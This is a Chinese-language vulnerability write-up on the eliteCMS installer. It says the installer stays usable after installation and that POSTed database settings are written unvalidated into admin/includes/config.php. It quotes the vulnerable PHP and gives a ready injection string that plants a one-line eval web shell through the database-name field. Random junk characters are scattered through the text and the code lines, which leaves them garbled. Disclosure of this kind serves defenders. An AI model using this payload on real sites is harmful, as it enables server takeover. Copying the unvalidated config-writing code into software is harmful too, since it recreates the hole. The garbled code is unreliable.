eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装
& w! ^& ^1 \  Z  T
( c, A2 N6 r! n: a另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码：
/ ?- u8 l+ i- T! S0 o8 \
, X  W! J5 S0 k; b+ O" T$ R9 ?...
/ Z, A! Z9 i7 p% T  d. \7 O' Helseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
$ @# C' }+ c8 T    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
  k3 ^7 M: U4 \% M9 ]...略...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
. R3 S# G* C( y/ g7 p) Z5 Y6 c    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
( D- ^; k5 _4 H    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
2 L# V/ L8 n, _6 h4 Y    $write .= "        \n";
& S5 x1 k+ t4 J/ j9 L    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
: v9 V9 A( |' Q' v' O3 C    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";
$ w# r0 [4 k# x3 C
    $writer = fopen($file, 'w');
...
9 B# t- ~' `& ^( z& }1 L
+ @0 [) K: C( O- D% D在看代码：
, e9 v: F, c, x1 J
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

取值未作任何验证
如果将数据库名POST数据：
( b6 A* E+ w* J% t$ y% \; d/ K0 y& N
"?><?php eval($_POST[c]);?><?php

" x) p2 u" F1 R0 }将导致一句话后门写入/admin/includes/config.php